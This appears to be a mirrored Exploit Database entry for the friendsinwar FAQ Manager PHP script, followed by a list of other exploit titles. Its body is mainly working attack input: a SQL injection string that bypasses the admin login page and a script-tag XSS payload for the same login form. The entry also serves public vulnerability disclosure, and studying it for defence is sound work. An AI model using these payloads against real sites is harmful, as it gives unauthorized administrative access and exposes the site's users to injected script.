friendsinwar FAQ Manager – SQL Injection / Authentication Bypass

Exploit Database
7 阅读

作者： d3b4g

日期： 2012-11-14
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/22710/

# Exploit Title: friendsinwar FAQ Manager SQL Injection (authbypass) Vulnerability
# Date: 13.10.201
# Exploit Author: d3b4g
# Vendor Homepage: http://www.friendsinwar.com
# Software Link: http://www.friendsinwar.com/script_demo/the_faq_manager/
# Tested on: Windows 7
# Blog: d3b4g.me


 

----------------------------------------------------------------------------------
 () SQL Injection :


 http://localhost/path/the_faq_manager/admin/login.php

 + Use following information to bypass login.

 
User:admin
 
' or ' 1=1


() Cross Site Scripting:

 XSS in loging form, insert follwing JS code to loging follwing. 

 '"()&%1<ScRiPt >prompt(952226)</ScRiPt>

 





-end-

last Exploits
friendsinwar FAQ Manager – SQL Injection / Authentication Bypass的更多信息

SMSmaster – SQL Injection：
VM Turbo Operations Manager 4.5x – Directory Traversal：
XEROX WorkCentre 6655 Printer – Cross-Site Request Forgery (Add Admin)：
Joomla! Component com_rokdownloads – Local File Inclusion：
Command School Student Management System – ‘/sw/admin_titles.php?id’ SQL Injection：
phpscripte24 Live Shopping Multi Portal System – SQL Injection：
GoAutoDial CE 3.3-1406088000 – Authentication Bypass / Arbitrary File Upload / Command Injection：
WordPress Plugin Business Intelligence – SQL Injection (Metasploit)：